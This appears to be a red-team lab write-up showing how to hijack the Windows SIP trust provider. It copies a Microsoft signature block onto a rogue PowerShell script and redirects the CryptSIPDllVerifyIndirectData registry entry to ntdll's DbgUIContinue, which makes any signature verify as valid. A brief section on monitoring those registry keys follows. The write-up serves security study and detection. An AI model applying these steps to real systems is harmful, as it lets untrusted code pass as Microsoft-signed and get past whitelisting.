SIP & Trust Provider Hijacking
Defense Evasion, Persistence, Whitelisting Bypass
In this lab, I will try to sign a simple "rogue" powershell script test-forged.ps1 that only has one line of code, with Microsoft's certificate and bypass any whitelisting protections/policies the script may be subject to if it is not signed.

Execution

The script that I will try to sign:
Just before I start, let's make sure that the script is not signed by using a Get-AuthenticodeSignature cmdlet and sigcheck by SysInternals:
In order to sign the script with Microsoft's certificate, we need to first find a native Microsoft Signed PowerShell script. I used powershell for this:
1
Get-ChildItem -Path C:\*.ps* -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "# SIG # Begin signature block"
Copied!
I chose one script at random and simply checked if it was signed - luckily it was:
1
type C:\Windows\WinSxS\x86_microsoft-windows-m..ell-cmdlets-modules_31bf3856ad364e35_10.0.16299.15_none_c7c20f51cd336675\Wdac.psd1
Copied!
Let's copy the Microsoft signature block to my script:
Now let's modify registry at:
1
HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}
Copied!
From:
To:
DLL
1
C:\Windows\System32\ntdll.dll
Copied!
FuncName
1
DbgUIContinue
Copied!
Now, let's launch a new powershell instance (for the registry changes to take effect) and check the signature of the forged script - note how it now shows as signed, verified and valid:

Observations

Monitoring the following registry keys/values helps discover this suspicious activity:

References

For all the registry keys/values that should be used as a baseline, please refer to the original research whitepaper by Matt Graeber: SpecterOps Subverting Trust inWindows
Subvert Trust Controls: SIP and Trust Provider Hijacking, Sub-technique T1553.003 - Enterprise | MITRE ATT&CK®
Hijacking Digital Signatures
Penetration Testing Lab
Unable to renew certificate via internal Microsoft certificate authority
Walkthrough: Request a Digital Certificate from Certificate Server or create a testing Digital Certificate to sign a Package
docsmsft
Signing PowerShell Scripts
shanselman
GitHub - netbiosX/Digital-Signature-Hijack: Binaries, PowerShell scripts and information about Digital Signature Hijacking.
GitHub
Last modified 2yr ago